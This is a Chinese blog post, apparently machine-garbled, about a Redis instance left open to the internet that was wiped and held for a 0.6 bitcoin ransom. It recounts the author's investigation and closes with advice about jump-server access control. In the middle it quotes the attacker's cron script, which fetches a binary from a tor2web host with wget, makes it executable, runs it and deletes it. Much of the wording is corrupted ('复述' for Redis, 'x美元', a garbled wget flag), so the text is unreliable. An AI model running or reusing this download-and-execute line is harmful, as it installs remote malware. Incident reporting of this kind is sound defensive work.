又一次复述,被删库跑路,索比0.6要特币 - 行业资讯 - 肥雀云

还在和媳妇儿逛街,突然同事打来电话说复述,库被清空。

于是,媳妇儿说你真是乌鸦嘴,早上还说复述,如何被提权的事情。

怎么刚出来就碰上了?

会不会是你搞的?

于是无形中又背锅了。

见×××姐如此着急,边安慰,边提醒让同事查一下,是什么时候发生的事情,受害面积有多大?

但是×××姐很镇静的说,不可以啊,我们ucloud云商上的复述的机器,是禁止外网登录的,
所有外网的6379端口都被禁用了。

仅限本机登录,于是,我问你有加密码嘛?×××姐说,便于程序研发效率,内网环境,自然就没有加密码。

于是,匆匆忙忙赶回去,登录上机器,通过uclod控制台确认看了下。

我擦被那个蠢货开启了一台机器的复述,外网,而这台机器,
××××××面除了一个监控调度的程序,是和其他机器完全隔离的,
没有任何业务直接关联的程序,除了复述,而且这台机器也不能连接到其他机器的复述。

这台机器没有任何机密核心数据。

结果登陆上机器就出现了

<代码>警告! 　　下载你的文件和数据库和备份alt="又一次复述,被删库跑路,索比0.6要特币”>

声明:需要在能访问谷歌的前提下,点击以下链接。

原文地址

看不懂英文点击这里

原来坑不止这一个,于是想起以前的hadoop纱的悲情故事。
查看到了阿里云先知社区的文章,如此熟悉又那么陌生。

紧接着确认了机器受害的情况,发现是在周六3点左右,

谁TM这时候搞,具有混淆性,乃至怀疑到了是不是内鬼所为,登录机器一查。

被清复述,库的机器上所有2018年11月3号的日志,最后信息,以及你能脑补到的,都被删除了。

唯独和唯一一台被开启外网复述,端口机器不同的是:

“这些被清复述,库机器的根家数据目录下属于的数据都在,也并没有warning.txt !”

毁坏程度可以查看阿里云官网脚本(虽然我们任务计划里显示的脚本只能下载下面这么一个)

又一次复述,被删库跑路,索比0.6要特币

内容如下:

 <代码>执行,在/dev/null
　　如果!ps - p $ (& lt;/tmp/.X11-lock);然后
　　x=/var/tmp/方式
　　wget曲——http://malwregafeg2fdjn.tor2web.me/?uname - m) - o x美元;chmod 777 $ x, x美元;rm - f $ x
　　fi

删库跑路加勒索,复述,勒索事件爆发

但参考上面文档以及直接受损害的机器,明显就是根,家里,数据目录都被删。

脚本丝毫没体现出备份到他们数据库的意思。

看下人家10秒之内就可以抵挡,你垃圾Ucloud,并没有动静。
可谓是大厂和小厂的天壤之别。

来不及悲伤与埋怨,媳妇儿也明知道重要数据都是已转移。

接下来的事情,就是确认其他复述,机器,受害面。

以及弥补方法。

据同事说删除了5台机器的数据估计直接是flushdb。

唯独不一样的是,被清库的所有复述,机器上面的文件目录都在,
而且也没有任何可疑的进程,更没有任务计划。

如果是* * *远程操作清除日志,奈何非要选择z只清除清库当天的日记。以及清除当天登录消息。甚至如此了解。让人不得不防是不是内鬼行为?

在数据有挽回希望的同时,小媳妇儿心理由于没有好好逛的街,而超级不爽。

人漂亮,技术也好,人缘自然不差的她,甚是憋屈。

虽然每一个离职人的权限都收回了,然而被一台没有在乎的机器,被不知名的人从中作梗,害人害己,显然让人为之怀疑这些搞破坏处心积虑的人之目的。

由于害怕被恰当的,查遍了所有机器,以及所有的秘钥认证。

于是,笔者推荐用jumpserver一定要严格的把控好权限,就算你删了日志又何妨,有本事你来删除我的跳转机日志。

毕竟权限大到好几个人都有登录嫌疑。又不好定位。

出事了开发人员大多都只管我现在不能用了,至于发生了什么,大抵谁都不会搭理。